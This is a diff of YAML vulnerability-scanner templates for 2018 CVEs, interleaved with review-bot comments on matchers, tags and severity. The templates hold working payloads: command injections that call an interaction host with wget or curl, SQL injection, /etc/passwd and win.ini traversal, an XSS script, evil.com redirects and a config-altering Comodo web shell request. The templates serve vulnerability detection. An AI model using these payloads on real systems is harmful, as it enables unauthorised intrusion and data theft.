@@ id: CVE-2018-1000856 + info: name: DomainMOD 4.11.01 - Cross-Site Scripting author: arafatansari severity: medium description: | - DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via segments/add.php Segment Name field. + DomainMOD 4.11.01 is vulnerable to cross-site scripting via the segments/add.php Segment Name field. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://github.com/domainmod/domainmod/issues/80 - https://nvd.nist.gov/vuln/detail/CVE-2018-1000856 @@ -13,10 +16,17 @@ info: cvss-score: 4.8 cve-id: CVE-2018-1000856 cwe-id: CWE-79 + epss-score: 0.00101 + epss-percentile: 0.41274 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - verified: "true" + verified: true + max-request: 3 + vendor: domainmod + product: domainmod tags: cve,cve2018,domainmod,xss,authenticated -requests: + +http: - raw: - | POST / HTTP/1.1 
@@ -34,19 +44,23 @@ requests: GET /segments/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - cookie-reuse: true - redirects: true + + host-redirects: true max-redirects: 3 + matchers-condition: and matchers: - type: word part: body words: - "" + - type: word part: header words: - text/html + - type: status status: - 200 +# digest: 4a0a0047304502204ee309065e5e0306ba0a5ab03ab7afb1f0f45ee06364730726979986ad7c518a022100bd53b5ce068753efed007fb99117704f5f715e2c11173ec8a897922d1cde264e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-10230.yaml b/poc/cve/CVE-2018-10230.yaml index 281d1a1d81..cca03a385b 100644 --- a/poc/cve/CVE-2018-10230.yaml +++ b/poc/cve/CVE-2018-10230.yaml 
@@ -1,24 +1,36 @@ id: CVE-2018-10230 + info: - name: Zend Server < 9.13 - XSS + name: Zend Server <9.13 - Cross-Site Scripting author: marcos_iaf severity: medium description: | - A vulnerability in ZendServer < 9.13 allows an attacker to perform Reflected XSS via the debug_host parameter. + Zend Server before version 9.13 is vulnerable to cross-site scripting via the debug_host parameter. + remediation: | + Upgrade Zend Server to version 9.13 or later to mitigate this vulnerability. reference: - https://www.synacktiv.com/ressources/zend_server_9_1_3_xss.pdf - - https://nvd.nist.gov/vuln/detail/CVE-2018-10230 - https://www.zend.com/en/products/server/release-notes + - https://nvd.nist.gov/vuln/detail/CVE-2018-10230 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-10230 cwe-id: CWE-79 + epss-score: 0.00122 + epss-percentile: 0.46323 + cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zend + product: zend_server tags: cve,cve2018,xss,zend -requests: + +http: - method: GET path: - "{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1" + matchers-condition: and matchers: - type: word @@ -27,10 +39,13 @@ requests: - "" - "is not allowed to open debug sessions" condition: and + - type: word part: header words: - text/html + - type: status status: - 200 +# digest: 4b0a00483046022100aea03256dfa10f799e16725ed2c477051df7bd5443429430877c7241e7fc0fd20221008e27e4cb55ea479e8ed7968f3d87766558b2db1bb677aa21da962d79c9b724f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-10818.yaml b/poc/cve/CVE-2018-10818.yaml index 68e9b68b7e..844ff2c7e6 100644 --- a/poc/cve/CVE-2018-10818.yaml +++ b/poc/cve/CVE-2018-10818.yaml 
@@ -1,40 +1,32 @@ id: CVE-2018-10818 info: - name: LG NAS Devices - Remote Code Execution + name: LG NAS Devices - Remote Code Execution (Unauthenticated) author: gy741 severity: critical - description: LG NAS devices contain a pre-auth remote command injection via the "password" parameter. - remediation: | - Apply the latest firmware update provided by LG to mitigate this vulnerability. + description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the "password" parameter. reference: - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10818 classification: cve-id: CVE-2018-10818 - metadata: - max-request: 2 tags: cve,cve2018,lg-nas,rce,oast,injection -variables: - useragent: '{{rand_base(6)}}' -http: +requests: - raw: - | POST /system/sharedir.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - &uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' + &uid=10; wget http://{{interactsh-url}} + - | POST /en/php/usb_sync.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - &act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' - - stop-at-first-match: true + &act=sync&task_number=1;wget http://{{interactsh-url}} matchers-condition: and matchers: 
@@ -43,9 +35,6 @@ http: words: - "http" - - type: word - part: interactsh_request - words: - - "User-Agent: {{useragent}}" - -# digest: 4a0a00473045022100ccb2d026c1bdc3df10c2c02d7bc19b1059c4e40e9ba5b5dcd07f77a4900f0e1502203ebc6f5387949a63d6f6166a279ef005ec5bec4c4caaf3df125ce8265eb44bc5:922c64590222798bb761d5b6d8e72950 + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2018-11231.yaml b/poc/cve/CVE-2018-11231.yaml index 09f1afc8d4..9412a5f837 100644 --- a/poc/cve/CVE-2018-11231.yaml +++ b/poc/cve/CVE-2018-11231.yaml 
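Review bot: With the `interactsh_request` matcher removed, the only callback check left in view is the word `http`, so any HTTP hit on the interaction URL, for example a proxy or link scanner fetching it, would be reported as this device being vulnerable. The old side tied the callback to the scan through a random `User-Agent` value. Keeping that matcher (`part: interactsh_request` with `"User-Agent: {{useragent}}"`) together with the `variables` block avoids those false positives. The added `status: 200` matcher does not replace it, since it only looks at the device's own HTTP reply. The first matcher's `part` line is outside the hunk.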
@@ -1,53 +1,38 @@ id: CVE-2018-11231 - info: name: Opencart Divido - Sql Injection author: ritikchaddha severity: high description: | OpenCart Divido plugin is susceptible to SQL injection - remediation: | - Apply the official patch or upgrade to a version that includes the fix. reference: - - https://web.archive.org/web/20220331072310/http://foreversong.cn/archives/1183 - - https://nvd.nist.gov/vuln/detail/CVE-2018-11231 - http://foreversong.cn/archives/1183 + - https://nvd.nist.gov/vuln/detail/CVE-2018-11231 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.1 + cvss-score: 8.10 cve-id: CVE-2018-11231 cwe-id: CWE-89 - epss-score: 0.00903 - epss-percentile: 0.8091 - cpe: cpe:2.3:a:divido:divido:-:*:*:*:*:opencart:*:* - metadata: - max-request: 1 - vendor: divido - product: divido - framework: opencart - tags: cve,cve2018,opencart,sqli,intrusive + tags: cve,cve2018,opencart,sqli variables: num: "999999999" - -http: +requests: - raw: - | POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1 Host: {{Hostname}} {"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)"},"status":2} - - host-redirects: true + redirects: true max-redirects: 2 - matchers-condition: and matchers: - type: word part: body words: - - "{{md5({{num}})}}" - + - '{{md5({{num}})}}' - type: status status: - 200 -# digest: 4b0a00483046022100e097fb68acef8081c15a24cfab0a6fe80c14be77655c0bfccb9ce47d778f094a022100b25d66c34f140c8fc9f5c19f2cea92f597b26108bed4915d6fc1c3e2a46fd044:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/06/19 diff --git a/poc/cve/CVE-2018-14064.yaml b/poc/cve/CVE-2018-14064.yaml index 7d0ea6a373..5e29e1cb36 100644 --- a/poc/cve/CVE-2018-14064.yaml +++ b/poc/cve/CVE-2018-14064.yaml 
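Review bot: `redirects: true` on the new side lets the engine follow redirects to any host, where the old `host-redirects: true` stayed on the scanned target. The matchers would then be evaluated against a response from a host outside the scan scope, which is both a scoping problem and a source of false results. I would keep `host-redirects: true` with `max-redirects: 2`.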
@@ -1,43 +1,30 @@ id: CVE-2018-14064 - info: name: VelotiSmart Wifi - Directory Traversal author: 0x_Akoko severity: critical description: VelotiSmart WiFi B-380 camera devices allow directory traversal via the uc-http service 1.0.0, as demonstrated by /../../etc/passwd on TCP port 80. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in VelotiSmart Wifi. reference: - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac - https://www.exploit-db.com/exploits/45030 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064 - - https://medium.com/%40s1kr10s/velotismart-0day-ca5056bcdcac classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-14064 cwe-id: CWE-22 - epss-score: 0.15755 - epss-percentile: 0.95389 - cpe: cpe:2.3:o:velotismart_project:velotismart_wifi_firmware:b-380:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: velotismart_project - product: velotismart_wifi_firmware - tags: edb,cve,cve2018,lfi,camera,iot - -http: + tags: cve,cve2018,lfi,camera,iot +requests: - method: GET path: - "{{BaseURL}}/../../etc/passwd" - matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 -# digest: 4b0a00483046022100ae59814b868fcf83d53efc8ed19dab194169cc8c54b32f6d49d6efefa6e1e79d0221009990b36de988d321a87f8e491bf4c205000c4c0d29d918c6dcc7c9c056b44873:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/05/12 diff --git a/poc/cve/CVE-2018-14912.yaml b/poc/cve/CVE-2018-14912.yaml index 8fd8fe4802..f54857e4e3 100644 --- a/poc/cve/CVE-2018-14912.yaml +++ b/poc/cve/CVE-2018-14912.yaml 
@@ -1,44 +1,27 @@ id: CVE-2018-14912 - info: - name: cgit < 1.2.1 - Directory Traversal + name: cgit < 1.2.1 Directory Traversal author: 0x_Akoko - severity: high - description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request. - remediation: | - Upgrade cgit to version 1.2.1 or later to mitigate the vulnerability. + severity: critical + description: cgit_clone_objects in CGit before 1.2.1 has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request. reference: - https://cxsecurity.com/issue/WLB-2018080034 - https://nvd.nist.gov/vuln/detail/CVE-2018-14912 - - https://lists.zx2c4.com/pipermail/cgit/2018-August/004176.html - - https://bugs.chromium.org/p/project-zero/issues/detail?id=1627 - - https://lists.debian.org/debian-lts-announce/2018/08/msg00005.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-14912 cwe-id: CWE-22 - epss-score: 0.96633 - epss-percentile: 0.9953 - cpe: cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: cgit_project - product: cgit - tags: cve,cve2018,cgit,lfi - -http: + tags: cve,cve18,Cgit,lfi +requests: - method: GET path: - "{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd" - matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 -# digest: 490a0046304402206482c0ca92c15f38ede4738b7bdc3e1df5a57e7895875742a9a0e71ae236caf0022005078fd001d2e64ae8b4472db736e3f910da9be7529f1c2e7b2968ab6a033bb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-15517.yaml b/poc/cve/CVE-2018-15517.yaml index 9e4dd5523e..e90608b124 100644 --- a/poc/cve/CVE-2018-15517.yaml +++ b/poc/cve/CVE-2018-15517.yaml 
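Review bot: The new `severity: critical` contradicts the unchanged `cvss-score: 7.5` and the confidentiality-only vector (`C:H/I:N/A:N`) directly below it, so findings from this template will be triaged above what the classification supports. In the same hunk the tags become `cve,cve18,Cgit,lfi`, which means a tag filter on `cve2018` or `cgit` may no longer select the template. I would keep `severity: high` and `tags: cve,cve2018,cgit,lfi`.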
@@ -1,32 +1,21 @@ id: CVE-2018-15517 info: - name: D-Link Central WifiManager - Server-Side Request Forgery - author: gy741 - severity: high - description: D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser. - remediation: | - Apply the latest security patches or updates provided by D-Link to fix the SSRF vulnerability in Central WifiManager. + name: D-LINK Central WifiManager Server-Side Request Forgery + description: "D-LINK Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser." 
reference: - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15517 - - http://seclists.org/fulldisclosure/2018/Nov/28 - - http://packetstormsecurity.com/files/150243/D-LINK-Central-WifiManager-CWM-100-1.03-r0098-Server-Side-Request-Forgery.html + author: gy741 + severity: high classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N - cvss-score: 8.6 + cvss-score: 8.60 cve-id: CVE-2018-15517 cwe-id: CWE-918 - epss-score: 0.01414 - epss-percentile: 0.84999 - cpe: cpe:2.3:a:dlink:central_wifimanager:1.03:r0098:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: dlink - product: central_wifimanager - tags: seclists,packetstorm,cve,cve2018,dlink,ssrf,oast + tags: cve,cve2018,dlink,ssrf,oast -http: +requests: - method: GET path: - "{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/" @@ -36,4 +25,5 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a0046304402202861e562e6dc026290094fe3f562cff6f060b2af0d856cad1d55f92e4a7db2530220629ab9cf1f9112b6f2e99ca75ddda4840b60919ae9c7a9841d82cc9ce9f7e166:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/04/06 diff --git a/poc/cve/CVE-2018-15535.yaml b/poc/cve/CVE-2018-15535.yaml index ed7aa501ed..6f97db14dd 100644 --- a/poc/cve/CVE-2018-15535.yaml +++ b/poc/cve/CVE-2018-15535.yaml 
@@ -1,9 +1,12 @@ id: CVE-2018-15535 + info: name: Responsive FileManager <9.13.4 - Local File Inclusion author: daffainfo severity: high - description: Responsive FileManager before version 9.13.4 is susceptible to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory. Instead, because it does not properly neutralize get_file sequences such as ".." can resolve to a location that is outside of that directory, aka local file inclusion. + description: Responsive FileManager before version 9.13.4 is vulnerable to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory, aka local file inclusion. + remediation: | + Upgrade to Responsive FileManager version 9.13.4 or later to fix the vulnerability. reference: - https://www.exploit-db.com/exploits/45271 - https://nvd.nist.gov/vuln/detail/CVE-2018-15535 @@ -14,18 +17,27 @@ info: cvss-score: 7.5 cve-id: CVE-2018-15535 cwe-id: CWE-22 - tags: cve,cve2018,lfi -requests: + epss-score: 0.97149 + epss-percentile: 0.99749 + cpe: cpe:2.3:a:tecrail:responsive_filemanager:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: tecrail + product: responsive_filemanager + tags: cve,cve2018,lfi,edb,seclists + +http: - method: GET path: - "{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 - -# Enhanced by mp on 2022/07/07 +# digest: 4a0a00473045022100ee54f126d8edd15e9cb9f4990712d5840ff03d732e20f4e3f54303eb7fa3fc7d0220303e1555f5ef9261aebca77c01c5cd22ed6f57d5cfbdb590e1292d398826add4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-16133.yaml b/poc/cve/CVE-2018-16133.yaml index 05ebf34a12..bf652a55d2 100644 
--- a/poc/cve/CVE-2018-16133.yaml +++ b/poc/cve/CVE-2018-16133.yaml @@ -1,32 +1,20 @@ id: CVE-2018-16133 - info: - name: Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion + name: Cybrotech CyBroHttpServer 1.0.3 Directory Traversal author: 0x_Akoko severity: medium - description: Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Cybrotech CyBroHttpServer 1.0.3. + description: Cybrotech CyBroHttpServer 1.0.3 allows Directory Traversal in the URI. reference: - https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-Traversal.html - http://www.cybrotech.com/ - - https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal - - https://nvd.nist.gov/vuln/detail/CVE-2018-16133 + - https://www.cvedetails.com/cve/CVE-2018-16133 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2018-16133 cwe-id: CWE-22 - epss-score: 0.05113 - epss-percentile: 0.92093 - cpe: cpe:2.3:a:cybrotech:cybrohttpserver:1.0.3:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: cybrotech - product: cybrohttpserver - tags: lfi,packetstorm,cve,cve2018,cybrotech - -http: + tags: cve,cve2018,cybrotech,lfi +requests: - raw: - |+ GET \..\..\..\..\Windows\win.ini HTTP/1.1 @@ -41,4 +29,3 @@ http: - "fonts" - "extensions" condition: and -# digest: 4b0a00483046022100803913dd9f8320843c85f7cbb2dbe6ba641aa63e4c1e3b55e636899455cb1798022100feae4373fbfd611b245c3d788d3cea8dc09c798b264cd6007f4250615addddfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-16167.yaml b/poc/cve/CVE-2018-16167.yaml index 59d9a3a939..e193b85e20 100644 --- a/poc/cve/CVE-2018-16167.yaml +++ b/poc/cve/CVE-2018-16167.yaml 
@@ -1,19 +1,32 @@ id: CVE-2018-16167 + info: - name: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated) + name: LogonTracer <=1.2.0 - Remote Command Injection author: gy741 severity: critical description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors. + remediation: | + Upgrade LogonTracer to a version higher than 1.2.0. reference: - https://www.exploit-db.com/exploits/49918 - https://nvd.nist.gov/vuln/detail/CVE-2018-16167 - tags: cve,cve2018,logontracer,rce,oast + - https://jvn.jp/en/vu/JVNVU98026636/index.html + - https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.1 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-16167 cwe-id: CWE-78 -requests: + epss-score: 0.18435 + epss-percentile: 0.95688 + cpe: cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: jpcert + product: logontracer + tags: rce,oast,edb,cve,cve2018,logontracer,intrusive + +http: - raw: - | POST /upload HTTP/1.1 @@ -21,9 +34,11 @@ requests: Content-Type: application/x-www-form-urlencoded logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B + matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - - "http" + - http +# digest: 490a00463044022025e177cf9f3e841bdd26660dad29f135ac4ef554ade59e61e09c07555d1477ae02205391af384220fca53b325c708351e6e7e7f7200b91b6fa9ef79322663d8fd849:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-16288.yaml b/poc/cve/CVE-2018-16288.yaml index d31045c5bb..69092bb0f3 100644 --- a/poc/cve/CVE-2018-16288.yaml +++ b/poc/cve/CVE-2018-16288.yaml 
@@ -4,25 +4,35 @@ info: name: LG SuperSign EZ CMS 2.5 - Local File Inclusion author: daffainfo severity: high - description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs. + description: | + LG SuperSign CMS 2.5 allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs - aka local file inclusion. + remediation: | + Apply the latest security patches or upgrade to a patched version of LG SuperSign EZ CMS. reference: - https://www.exploit-db.com/exploits/45440 - - https://www.cvedetails.com/cve/CVE-2018-16288 - tags: cve,cve2018,lfi + - http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html + - https://nvd.nist.gov/vuln/detail/CVE-2018-16288 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.60 + cvss-score: 8.6 cve-id: CVE-2018-16288 cwe-id: CWE-200 + epss-score: 0.16221 + epss-percentile: 0.95454 + cpe: cpe:2.3:a:lg:supersign_cms:2.5:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: lg + product: supersign_cms + tags: cve,cve2018,lfi,supersign,edb -requests: +http: - method: GET path: - "{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd" matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -30,3 +40,4 @@ requests: - type: status status: - 200 +# digest: 4a0a0047304502207c11a0436c74c411a524e4d97a3c58de9a6e671debf9913b3dbcc641c5adaa65022100f11eb819310a6d1ed412d7db13481be3b29aac7869268ca9a41f24aa844276ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-17422.yaml b/poc/cve/CVE-2018-17422.yaml index c80e6df90f..68f71442de 100644 --- a/poc/cve/CVE-2018-17422.yaml +++ b/poc/cve/CVE-2018-17422.yaml 
@@ -1,43 +1,34 @@ id: CVE-2018-17422 - info: - name: DotCMS < 5.0.2 - Open Redirect + name: dotCMS < 5.0.2 - Open Redirect author: 0x_Akoko,daffainfo severity: medium description: | - dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - remediation: | - Upgrade to a version of DotCMS that is higher than 5.0.2 to mitigate the open redirect vulnerability. + dotCMS before 5.0.2 has open redirects via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. reference: - https://github.com/dotCMS/core/issues/15286 - - https://nvd.nist.gov/vuln/detail/CVE-2018-17422 + - https://www.cvedetails.com/cve/CVE-2018-17422 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-17422 cwe-id: CWE-601 - epss-score: 0.00118 - epss-percentile: 0.45709 - cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: - verified: true - max-request: 2 - vendor: dotcms - product: dotcms shodan-query: http.title:"dotCMS" + verified: "true" tags: cve,cve2018,redirect,dotcms - -http: +requests: - method: GET path: - - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://evil.com' - - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com' - + - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh' + - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh' stop-at-first-match: true + matchers-condition: and matchers: - type: word part: body words: - - "self.location = 'http://evil.com'" - - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'" -# digest: 
490a00463044022069e79958c8d7b6061fe4dff9e3c42b83b2a60b6430d6ce7640cf6c1250aeac45022011f8d21eb433c95b6f499d4a23b57ccb8f5788c1aff99305cbf1db3af44d823d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - "self.location = 'http://www.interact.sh'" + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2018-17431.yaml b/poc/cve/CVE-2018-17431.yaml index 43bc26ce6b..a95adc99ce 100644 --- a/poc/cve/CVE-2018-17431.yaml +++ b/poc/cve/CVE-2018-17431.yaml @@ -1,21 +1,33 @@ id: CVE-2018-17431 + info: name: Comodo Unified Threat Management Web Console - Remote Code Execution author: dwisiswant0 severity: critical description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 are susceptible to a web shell based remote code execution vulnerability. + remediation: | + Apply the latest security patches or updates provided by Comodo to fix this vulnerability. reference: - https://www.exploit-db.com/exploits/48825 - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276 - https://nvd.nist.gov/vuln/detail/CVE-2018-17431 - https://github.com/Fadavvi/CVE-2018-17431-PoC#confirmation-than-bug-exist-2018-09-25-ticket-id-xwr-503-79437 + - https://drive.google.com/file/d/0BzFJhNQNHcoTbndsUmNjVWNGYWNJaWxYcWNyS2ZDajluTDFz/view classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-17431 cwe-id: CWE-287 - tags: cve,cve2018,comodo,rce -requests: + epss-score: 0.10458 + epss-percentile: 0.94426 + cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: comodo + product: unified_threat_management_firewall + tags: cve2018,comodo,rce,edb,cve + +http: - raw: - | GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1 
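Review bot: In the CVE-2018-17422 hunk the word matcher keeps only `self.location = 'http://www.interact.sh'`, while the removed side also matched the `location.href = '...'` form. The second path (`page_preview_popup.jsp?hostname=interact.sh`) is still requested, but it appears to have no string left that can match. Together with the added `matchers-condition: and` this would make that variant a silent false negative. I would restore a second entry under `words`, for example `- "location.href = 'http\\x3a\\x2f\\x2fwww\\x2einteract\\x2esh'"`, after confirming the exact output on a test instance.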
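Review bot: In the CVE-2018-17431 hunk the new `tags: cve2018,comodo,rce,edb,cve` line lacks `intrusive`, although the first raw request sends a console command sequence in its `k=` parameter. The matcher in the following hunk then looks for "Configuration has been altered", so a positive result implies the target's configuration was changed. Scans that exclude state-changing checks by tag will still run it. I would add the tag, `tags: cve2018,comodo,rce,edb,cve,intrusive`, and put a short comment above the raw block saying the check modifies device state.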
@@ -25,14 +37,15 @@ requests: GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1 Host: {{Hostname}} Connection: close + matchers-condition: and matchers: - type: word + part: body words: - "Configuration has been altered" - part: body + - type: status status: - 200 - -# Enhanced by mp on 2022/05/13 +# digest: 490a0046304402201f1a49f2400315ab1ac93a3089241aa3426fb961fc7a4d15a7c15ffc2f48a9b30220025cb3006dd565ae3d0d11224175ebbfddeb3c50d1494791e88f281087a2bb41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-18608.yaml b/poc/cve/CVE-2018-18608.yaml index c8501bfe0f..a9d9e5059a 100644 --- a/poc/cve/CVE-2018-18608.yaml +++ b/poc/cve/CVE-2018-18608.yaml 
@@ -1,27 +1,38 @@ id: CVE-2018-18608 + info: - name: DedeCMS V5.7 - Cross Site Scripting + name: DedeCMS 5.7 SP2 - Cross-Site Scripting author: ritikchaddha severity: medium description: | - DedeCMS 5.7 SP2 allows XSS via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php. + DedeCMS 5.7 SP2 is vulnerable to cross-site scripting via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php. + remediation: | + Upgrade to the latest version of DedeCMS or apply the official patch provided by the vendor to fix the XSS vulnerability. reference: - https://github.com/ky-j/dedecms/issues/8 - - https://nvd.nist.gov/vuln/detail/CVE-2018-18608 - https://github.com/ky-j/dedecms/files/2504649/Reflected.XSS.Vulnerability.exists.in.the.file.of.DedeCMS.V5.7.SP2.docx + - https://nvd.nist.gov/vuln/detail/CVE-2018-18608 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-18608 cwe-id: CWE-79 